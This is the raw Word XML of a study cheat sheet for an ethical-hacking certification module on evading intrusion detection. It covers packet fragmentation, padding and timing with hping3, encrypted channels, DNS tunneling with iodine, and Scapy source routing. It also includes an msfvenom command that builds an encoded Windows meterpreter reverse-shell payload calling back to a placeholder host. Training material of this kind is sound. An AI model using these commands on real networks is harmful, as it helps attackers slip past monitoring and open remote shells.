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CEH Module 12: Evasion Techniques Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Fragmentation Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Breaking a packet into small fragments to bypass IDS inspection.</w:t>
        <w:br/>
        <w:t>Tools: hping3, Scapy</w:t>
        <w:br/>
        <w:t>Command Example (hping3): hping3 -f -S -p 80 &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Polymorphic Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Modifying shellcode so that it changes every time, making it hard for signature-based IDS to detect.</w:t>
        <w:br/>
        <w:t>Tools: msfvenom, Shikata Ga Nai encoder in Metasploit</w:t>
        <w:br/>
        <w:t>Command Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;port&gt; -e x86/shikata_ga_nai -i 3 -f exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Using Encrypted Channels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Encrypting malicious traffic so IDS cannot read its content.</w:t>
        <w:br/>
        <w:t>Tools: OpenSSL, stunnel</w:t>
        <w:br/>
        <w:t>Command Example: stunnel stunnel.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Packet Padding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Adding extra, meaningless data to packets to avoid signature detection.</w:t>
        <w:br/>
        <w:t>Tools: hping3</w:t>
        <w:br/>
        <w:t>Command Example: hping3 --padfile &lt;file&gt; &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Protocol Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hiding malicious traffic inside allowed protocols (e.g., HTTP, DNS).</w:t>
        <w:br/>
        <w:t>Tools: iodine (for DNS tunneling), httptunnel</w:t>
        <w:br/>
        <w:t>Command Example (iodine): iodine -f &lt;password&gt; &lt;dns_server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Traffic Timing Alteration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sending packets at irregular intervals to avoid pattern detection.</w:t>
        <w:br/>
        <w:t>Tools: hping3</w:t>
        <w:br/>
        <w:t>Command Example: hping3 -i u100000 &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Source Routing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Specifying the route a packet should take to avoid monitored network paths.</w:t>
        <w:br/>
        <w:t>Tools: Scapy</w:t>
        <w:br/>
        <w:t>Command Example: scapy &gt;&gt; send(IP(dst='&lt;target_ip&gt;', options=[IPOption_RR()])/TCP(dport=80))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